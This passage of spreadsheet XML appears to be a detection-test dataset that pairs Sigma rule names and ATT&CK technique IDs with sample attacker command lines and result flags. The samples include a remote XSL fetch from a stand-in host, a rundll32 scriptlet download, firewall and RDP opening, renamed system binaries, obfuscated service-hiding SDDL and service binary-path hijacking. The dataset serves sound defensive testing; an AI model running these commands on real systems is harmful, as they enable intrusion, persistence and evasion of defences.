          <t>Potential Tampering With RDP Related Registry Keys Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2678" s="43" t="inlineStr">
        <is>
          <t>0d5675be-bc88-4172-86d3-1e96a4476536</t>
        </is>
      </c>
      <c r="E2678" s="43" t="inlineStr">
        <is>
          <t>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2678" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2678" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2678" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2678" s="43" t="n"/>
      <c r="J2678" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2678" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2679" ht="15.75" customHeight="1" s="42">
      <c r="A2679" s="43" t="inlineStr">
        <is>
          <t>t1021.001</t>
        </is>
      </c>
      <c r="B2679" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_rdp_keys_tamper</t>
        </is>
      </c>
      <c r="C2679" s="43" t="inlineStr">
        <is>
          <t>Potential Tampering With RDP Related Registry Keys Via Reg.EXE</t>
        </is>
      </c>
      <c r="D2679" s="43" t="inlineStr">
        <is>
          <t>0d5675be-bc88-4172-86d3-1e96a4476536</t>
        </is>
      </c>
      <c r="E2679" s="43" t="inlineStr">
        <is>
          <t>reg add HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f</t>
        </is>
      </c>
      <c r="F2679" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2679" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2679" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2679" s="43" t="n"/>
      <c r="J2679" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2679" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2680" ht="15.75" customHeight="1" s="42">
      <c r="A2680" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B2680" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_renamed_meshagent_execution</t>
        </is>
      </c>
      <c r="C2680" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D2680" s="43" t="inlineStr">
        <is>
          <t>b471f462-eb0d-4832-be35-28d94bdb4780</t>
        </is>
      </c>
      <c r="E2680" s="43" t="inlineStr">
        <is>
          <t>meshagent.exe --meshServiceName</t>
        </is>
      </c>
      <c r="F2680" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2680" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2680" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2680" s="43" t="n"/>
      <c r="J2680" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2680" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2681" ht="15.75" customHeight="1" s="42">
      <c r="A2681" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B2681" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_renamed_meshagent_execution</t>
        </is>
      </c>
      <c r="C2681" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D2681" s="43" t="inlineStr">
        <is>
          <t>b471f462-eb0d-4832-be35-28d94bdb4780</t>
        </is>
      </c>
      <c r="E2681" s="43" t="inlineStr">
        <is>
          <t>meshagent.exe --meshServiceName -arg1 -arg2</t>
        </is>
      </c>
      <c r="F2681" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2681" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2681" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2681" s="43" t="n"/>
      <c r="J2681" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2681" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2682" ht="15.75" customHeight="1" s="42">
      <c r="A2682" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B2682" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_renamed_meshagent_execution</t>
        </is>
      </c>
      <c r="C2682" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D2682" s="43" t="inlineStr">
        <is>
          <t>b471f462-eb0d-4832-be35-28d94bdb4780</t>
        </is>
      </c>
      <c r="E2682" s="43" t="inlineStr">
        <is>
          <t>meshagent.exe -meshServiceName</t>
        </is>
      </c>
      <c r="F2682" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2682" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2682" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2682" s="43" t="n"/>
      <c r="J2682" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2682" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2683" ht="15.75" customHeight="1" s="42">
      <c r="A2683" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B2683" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_renamed_meshagent_execution</t>
        </is>
      </c>
      <c r="C2683" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D2683" s="43" t="inlineStr">
        <is>
          <t>b471f462-eb0d-4832-be35-28d94bdb4780</t>
        </is>
      </c>
      <c r="E2683" s="43" t="inlineStr">
        <is>
          <t>meshagent.exe --meshServiceName`</t>
        </is>
      </c>
      <c r="F2683" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2683" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2683" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2683" s="43" t="n"/>
      <c r="J2683" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2683" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2684" ht="15.75" customHeight="1" s="42">
      <c r="A2684" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B2684" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_renamed_meshagent_execution</t>
        </is>
      </c>
      <c r="C2684" s="43" t="inlineStr">
        <is>
          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D2684" s="43" t="inlineStr">
        <is>
          <t>b471f462-eb0d-4832-be35-28d94bdb4780</t>
        </is>
      </c>
      <c r="E2684" s="43" t="inlineStr">
        <is>
          <t>meshagent.exe --meshServiceName^</t>
        </is>
      </c>
      <c r="F2684" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2684" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2684" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2684" s="43" t="n"/>
      <c r="J2684" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2684" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2685" ht="15.75" customHeight="1" s="42">
      <c r="A2685" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B2685" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msxsl_remote_execution</t>
        </is>
      </c>
      <c r="C2685" s="43" t="inlineStr">
        <is>
          <t>Remote XSL Execution Via Msxsl.EXE</t>
        </is>
      </c>
      <c r="D2685" s="43" t="inlineStr">
        <is>
          <t>75d0a94e-6252-448d-a7be-d953dff527bb</t>
        </is>
      </c>
      <c r="E2685" s="43" t="inlineStr">
        <is>
          <t>msxsl.exe local.xml http://10.0.0.5/malicious.xsl</t>
        </is>
      </c>
      <c r="F2685" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2685" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2685" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2685" s="43" t="n"/>
      <c r="J2685" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2685" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2686" ht="15.75" customHeight="1" s="42">
      <c r="A2686" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B2686" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msxsl_remote_execution</t>
        </is>
      </c>
      <c r="C2686" s="43" t="inlineStr">
        <is>
          <t>Remote XSL Execution Via Msxsl.EXE</t>
        </is>
      </c>
      <c r="D2686" s="43" t="inlineStr">
        <is>
          <t>75d0a94e-6252-448d-a7be-d953dff527bb</t>
        </is>
      </c>
      <c r="E2686" s="43" t="inlineStr">
        <is>
          <t>msxsl.exe local.xml "http://10.0.0.5/malicious.xsl"</t>
        </is>
      </c>
      <c r="F2686" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2686" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2686" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2686" s="43" t="n"/>
      <c r="J2686" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2686" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2687" ht="15.75" customHeight="1" s="42">
      <c r="A2687" s="43" t="inlineStr">
        <is>
          <t>t1220</t>
        </is>
      </c>
      <c r="B2687" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msxsl_remote_execution</t>
        </is>
      </c>
      <c r="C2687" s="43" t="inlineStr">
        <is>
          <t>Remote XSL Execution Via Msxsl.EXE</t>
        </is>
      </c>
      <c r="D2687" s="43" t="inlineStr">
        <is>
          <t>75d0a94e-6252-448d-a7be-d953dff527bb</t>
        </is>
      </c>
      <c r="E2687" s="43" t="inlineStr">
        <is>
          <t>msxsl.exe local.xml http://10.0.0.5/malicious.xsl -o output.xml</t>
        </is>
      </c>
      <c r="F2687" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2687" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2687" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2687" s="43" t="n"/>
      <c r="J2687" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2687" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2688" ht="15.75" customHeight="1" s="42">
      <c r="A2688" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2688" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_add_rule</t>
        </is>
      </c>
      <c r="C2688" s="43" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2688" s="43" t="inlineStr">
        <is>
          <t>cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c</t>
        </is>
      </c>
      <c r="E2688" s="43" t="inlineStr">
        <is>
          <t>"C:\\WINDOWS\\SysWOW64\\netsh" firewall add portopening TCP 5800 vnc5800</t>
        </is>
      </c>
      <c r="F2688" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2688" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2688" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2688" s="43" t="n"/>
      <c r="J2688" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2688" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2689" ht="15.75" customHeight="1" s="42">
      <c r="A2689" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2689" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_add_rule</t>
        </is>
      </c>
      <c r="C2689" s="43" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2689" s="43" t="inlineStr">
        <is>
          <t>cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c</t>
        </is>
      </c>
      <c r="E2689" s="43" t="inlineStr">
        <is>
          <t>"C:\\WINDOWS\\SysWOW64\\netsh" firewall add portopening TCP 5900 vnc5900</t>
        </is>
      </c>
      <c r="F2689" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2689" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2689" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2689" s="43" t="n"/>
      <c r="J2689" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2689" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2690" ht="15.75" customHeight="1" s="42">
      <c r="A2690" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2690" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_add_rule</t>
        </is>
      </c>
      <c r="C2690" s="43" t="inlineStr">
        <is>
          <t>New Firewall Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2690" s="43" t="inlineStr">
        <is>
          <t>cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c</t>
        </is>
      </c>
      <c r="E2690" s="43" t="inlineStr">
        <is>
          <t>copy netsh.exe not_netsh.exe &amp;&amp; not_netsh.exe advfirewall firewall add rule name='Allow In' dir=in action=allow protocol=TCP localport=8080</t>
        </is>
      </c>
      <c r="F2690" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2690" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2690" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2690" s="43" t="n"/>
      <c r="J2690" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2690" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2691" ht="15.75" customHeight="1" s="42">
      <c r="A2691" s="43" t="inlineStr">
        <is>
          <t>t1562.004</t>
        </is>
      </c>
      <c r="B2691" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_fw_allow_rdp</t>
        </is>
      </c>
      <c r="C2691" s="43" t="inlineStr">
        <is>
          <t>RDP Connection Allowed Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D2691" s="43" t="inlineStr">
        <is>
          <t>01aeb693-138d-49d2-9403-c4f52d7d3d62</t>
        </is>
      </c>
      <c r="E2691" s="43" t="inlineStr">
        <is>
          <t>netsh.exe advf"irewall" fire"wall" add rule name="Allow RDP" dir=in action=allow protocol=6 localport=3389</t>
        </is>
      </c>
      <c r="F2691" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2691" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2691" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2691" s="43" t="n"/>
      <c r="J2691" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2691" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2692" ht="15.75" customHeight="1" s="42">
      <c r="A2692" s="43" t="inlineStr">
        <is>
          <t>defense-evasion</t>
        </is>
      </c>
      <c r="B2692" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_nslookup_poweshell_download</t>
        </is>
      </c>
      <c r="C2692" s="43" t="inlineStr">
        <is>
          <t>Nslookup PowerShell Download Cradle - ProcessCreation</t>
        </is>
      </c>
      <c r="D2692" s="43" t="inlineStr">
        <is>
          <t>1b3b01c7-84e9-4072-86e5-fc285a41ff23</t>
        </is>
      </c>
      <c r="E2692" s="43" t="inlineStr">
        <is>
          <t>"C:\\WINDOWS\\system32\\nslookup.exe" -querytype=txt example.com 8.8.8.8</t>
        </is>
      </c>
      <c r="F2692" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2692" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2692" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2692" s="43" t="n"/>
      <c r="J2692" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2692" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2693" ht="15.75" customHeight="1" s="42">
      <c r="A2693" s="43" t="inlineStr">
        <is>
          <t>defense-evasion</t>
        </is>
      </c>
      <c r="B2693" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_nslookup_poweshell_download</t>
        </is>
      </c>
      <c r="C2693" s="43" t="inlineStr">
        <is>
          <t>Nslookup PowerShell Download Cradle - ProcessCreation</t>
        </is>
      </c>
      <c r="D2693" s="43" t="inlineStr">
        <is>
          <t>1b3b01c7-84e9-4072-86e5-fc285a41ff23</t>
        </is>
      </c>
      <c r="E2693" s="43" t="inlineStr">
        <is>
          <t>"C:\\WINDOWS\\system32\\nslookup.exe" -q=txt example.com 8.8.8.8</t>
        </is>
      </c>
      <c r="F2693" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2693" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2693" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2693" s="43" t="n"/>
      <c r="J2693" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2693" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2694" ht="15.75" customHeight="1" s="42">
      <c r="A2694" s="43" t="inlineStr">
        <is>
          <t>defense-evasion</t>
        </is>
      </c>
      <c r="B2694" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_mshtml_runhtmlapplication</t>
        </is>
      </c>
      <c r="C2694" s="43" t="inlineStr">
        <is>
          <t>Mshtml.DLL RunHTMLApplication Suspicious Usage</t>
        </is>
      </c>
      <c r="D2694" s="43" t="inlineStr">
        <is>
          <t>4782eb5a-a513-4523-a0ac-f3082b26ac5c</t>
        </is>
      </c>
      <c r="E2694" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";document.write();GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct").Exec();window.close();</t>
        </is>
      </c>
      <c r="F2694" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2694" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2694" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2694" s="43" t="n"/>
      <c r="J2694" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2694" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2695" ht="15.75" customHeight="1" s="42">
      <c r="A2695" s="43" t="inlineStr">
        <is>
          <t>defense-evasion</t>
        </is>
      </c>
      <c r="B2695" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_mshtml_runhtmlapplication</t>
        </is>
      </c>
      <c r="C2695" s="43" t="inlineStr">
        <is>
          <t>Mshtml.DLL RunHTMLApplication Suspicious Usage</t>
        </is>
      </c>
      <c r="D2695" s="43" t="inlineStr">
        <is>
          <t>4782eb5a-a513-4523-a0ac-f3082b26ac5c</t>
        </is>
      </c>
      <c r="E2695" s="43" t="inlineStr">
        <is>
          <t>rundll32 vbscript:"\..\mshtml,RunHTMLApplication" +String(CreateObject("WScript.Shell").Run("calc.exe"),0)</t>
        </is>
      </c>
      <c r="F2695" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2695" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2695" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2695" s="43" t="n"/>
      <c r="J2695" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2695" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2696" ht="15.75" customHeight="1" s="42">
      <c r="A2696" s="43" t="inlineStr">
        <is>
          <t>t1218.008</t>
        </is>
      </c>
      <c r="B2696" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_odbcconf_register_dll_regsvr</t>
        </is>
      </c>
      <c r="C2696" s="43" t="inlineStr">
        <is>
          <t>New DLL Registered Via Odbcconf.EXE</t>
        </is>
      </c>
      <c r="D2696" s="43" t="inlineStr">
        <is>
          <t>9f0a8bf3-a65b-440a-8c1e-5cb1547c8e70</t>
        </is>
      </c>
      <c r="E2696" s="43" t="inlineStr">
        <is>
          <t>odbcconf.exe /A {REGSVR "C:\\Temp\\malicious.txt"}</t>
        </is>
      </c>
      <c r="F2696" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2696" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2696" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2696" s="43" t="n"/>
      <c r="J2696" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2696" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2697" ht="15.75" customHeight="1" s="42">
      <c r="A2697" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B2697" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_hide_services_via_set_service</t>
        </is>
      </c>
      <c r="C2697" s="43" t="inlineStr">
        <is>
          <t>Abuse of Service Permissions to Hide Services Via Set-Service</t>
        </is>
      </c>
      <c r="D2697" s="43" t="inlineStr">
        <is>
          <t>514e4c3a-c77d-4cde-a00f-046425e2301e</t>
        </is>
      </c>
      <c r="E2697" s="43" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name 'MyService' -SecurityDescriptorSddl ('DCLCW'+'PDTSD')"</t>
        </is>
      </c>
      <c r="F2697" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2697" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2697" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2697" s="43" t="n"/>
      <c r="J2697" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2697" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2698" ht="15.75" customHeight="1" s="42">
      <c r="A2698" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B2698" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_hide_services_via_set_service</t>
        </is>
      </c>
      <c r="C2698" s="43" t="inlineStr">
        <is>
          <t>Abuse of Service Permissions to Hide Services Via Set-Service</t>
        </is>
      </c>
      <c r="D2698" s="43" t="inlineStr">
        <is>
          <t>514e4c3a-c77d-4cde-a00f-046425e2301e</t>
        </is>
      </c>
      <c r="E2698" s="43" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name 'MyService' -SecurityDescriptorSddl (([char[]]'DSTDPWCLCD' | ForEach-Object { $_ }) -join '' -replace 'DSTDPWCLCD','DCLCWPDTSD')"</t>
        </is>
      </c>
      <c r="F2698" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2698" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2698" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2698" s="43" t="n"/>
      <c r="J2698" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2698" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2699" ht="15.75" customHeight="1" s="42">
      <c r="A2699" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B2699" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_hide_services_via_set_service</t>
        </is>
      </c>
      <c r="C2699" s="43" t="inlineStr">
        <is>
          <t>Abuse of Service Permissions to Hide Services Via Set-Service</t>
        </is>
      </c>
      <c r="D2699" s="43" t="inlineStr">
        <is>
          <t>514e4c3a-c77d-4cde-a00f-046425e2301e</t>
        </is>
      </c>
      <c r="E2699" s="43" t="inlineStr">
        <is>
          <t>pwsh.exe -Command "Set-Service -Name 'MyService' -SecurityDescriptorSddl $([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('RExMQ0NQVFBETlNERT0=')))"</t>
        </is>
      </c>
      <c r="F2699" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2699" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2699" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2699" s="43" t="n"/>
      <c r="J2699" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2699" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2700" ht="15.75" customHeight="1" s="42">
      <c r="A2700" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B2700" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_change_sevice_image_path_by_non_admin</t>
        </is>
      </c>
      <c r="C2700" s="43" t="inlineStr">
        <is>
          <t>Possible Privilege Escalation via Weak Service Permissions</t>
        </is>
      </c>
      <c r="D2700" s="43" t="inlineStr">
        <is>
          <t>d937b75f-a665-4480-88a5-2f20e9f9b22a</t>
        </is>
      </c>
      <c r="E2700" s="43" t="inlineStr">
        <is>
          <t>"sc.exe" config WeakService BINPATH= "mal.exe"</t>
        </is>
      </c>
      <c r="F2700" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2700" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2700" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2700" s="43" t="n"/>
      <c r="J2700" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2700" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2701" ht="15.75" customHeight="1" s="42">
      <c r="A2701" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B2701" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C2701" s="43" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D2701" s="43" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E2701" s="43" t="inlineStr">
        <is>
          <t>copy sc.exe update.exe &amp;&amp; update.exe sdset TargetService D:(D;;DCLCWPDTSD;;;IU)(A;;CCLCSWLOCRRC;;;AU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)</t>
        </is>
      </c>
      <c r="F2701" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2701" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2701" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2701" s="43" t="n"/>
      <c r="J2701" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2701" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2702" ht="15.75" customHeight="1" s="42">
      <c r="A2702" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2702" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C2702" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D2702" s="43" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E2702" s="43" t="inlineStr">
        <is>
          <t>AdvancedRun.exe /EXEFilename "cmd.exe" /RunAs 4 /WindowState 0 /Run</t>
        </is>
      </c>
      <c r="F2702" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2702" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2702" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2702" s="43" t="n"/>
      <c r="J2702" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2702" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2703" ht="15.75" customHeight="1" s="42">
      <c r="A2703" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2703" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C2703" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D2703" s="43" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E2703" s="43" t="inlineStr">
        <is>
          <t>AdvancedRun.exe /EXEFilename "cmd.exe" /RunAs 4 /Run</t>
        </is>
      </c>
      <c r="F2703" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2703" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2703" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2703" s="43" t="n"/>
      <c r="J2703" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2703" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2704" ht="15.75" customHeight="1" s="42">
      <c r="A2704" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
      <c r="B2704" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_advancedrun</t>
        </is>
      </c>
      <c r="C2704" s="43" t="inlineStr">
        <is>
          <t>PUA - AdvancedRun Execution</t>
        </is>
      </c>
      <c r="D2704" s="43" t="inlineStr">
        <is>
          <t>d2b749ee-4225-417e-b20e-a8d2193cbb84</t>
        </is>
      </c>
      <c r="E2704" s="43" t="inlineStr">
        <is>
          <t>AdvancedRun.exe /EXEFilename cmd.exe /RunAs 8 /Run</t>
        </is>
      </c>
      <c r="F2704" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2704" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2704" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2704" s="43" t="n"/>
      <c r="J2704" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2704" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2705" ht="15.75" customHeight="1" s="42">
      <c r="A2705" s="43" t="inlineStr">
        <is>
          <t>t1564.003</t>
        </is>
      </c>
